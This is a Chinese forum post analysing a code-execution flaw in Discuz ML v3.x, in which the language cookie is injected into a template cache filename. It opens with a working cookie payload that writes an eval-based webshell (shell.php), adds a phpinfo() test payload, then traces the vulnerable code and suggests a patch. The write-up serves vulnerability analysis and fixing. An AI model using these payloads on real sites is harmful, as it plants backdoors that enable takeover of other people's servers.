hyff 话唠
  • 1484发帖数
  • 183主题数
  • 0关注数
  • 1粉丝
开启左侧

Discuz Ml v3.x 代码执行分析

[复制链接]
hyff 发表于 2019-12-20 19:54:36 | 显示全部楼层 |阅读模式 打印 上一主题 下一主题
很多人喷咱们最近不发技术文章,现在发一个吧,同时欢迎各位多多指教。
Discuz Ml v3.x 代码执行分析
EXP
修改Cookie中的xxxx_language字段为以下内容即可
%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp+%2520eval%28%2524_%2547%2545%2554%255b%2522a1%2522%255d%29%253b%253f%253e%27%29%29.%27
访问网站首页则会在根目录下生成木马文件,shell.php 密码为a1

                               
登录/注册后可看大图


定位漏洞的位置
解码exp
'.+file_put_contents('shell.php',urldecode('')).
修改exp为_language=1.1.1;使其报错

                               
登录/注册后可看大图


定位到653行

                               
登录/注册后可看大图


关键代码644行
$cachefile = './data/template/'.DISCUZ_LANG.'_'.(defined('STYLEID') ? STYLEID.'_' : '_').$templateid.'_'.str_replace('/', '_', $file).'.tpl.php';
cachefile变量是缓存文件,将其写入到/data/template/目录下,并且由DISCUZ_LANG拼接,追踪下DISCUZ_LANG的值
2088-2096行
global $_G;
if($_G['config']['output']['language'] == 'zh_cn') {
return 'SC_UTF8';
} elseif ($_G['config']['output']['language'] == 'zh_tw') {
return 'TC_UTF8';
} else {
//vot !!!! ToDo: Check this for other languages !!!!!!!!!!!!!!!!!!!!!
/*vot*/ return strtoupper(DISCUZ_LANG) . '_UTF8';
}
可以看到$_G['config']['output']['language']作为DISCUZ_LANG的值
全局搜索['language']
source/class/discuz/discuz_application.php 305行,发现是从cookie中拿到language的值

                               
登录/注册后可看大图


那么到这里整个漏洞的流程就很明显了,cookie中language参数可控导致DISCUZ_LANG可控,从而导致cachefile的文件名可被注入代码,最终include_once包含一下导致了造成代码执行。
phpinfo验证
Ov1T_2132_language='.phpinfo().';

                               
登录/注册后可看大图


修复建议
建议修改source/function/function_core.php 644行为
/*vot*/ $cachefile = './data/template/'.'sc'.'_'.(defined('STYLEID') ? STYLEID.'_' : '_').$templateid.'_'.str_replace('/', '_', $file).'.tpl.php';
删除可控变量
其实从漏洞点的注释上来看就知道这是一个未完成的部分,毕竟还是TODO,开发人员得背锅。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

猜你喜欢
在线客服邮箱
wxcy#wkgb.net

邮箱地址#换为@

Powered by 创意电子 ©2018-现在 专注资源实战分享源码下载站联盟商城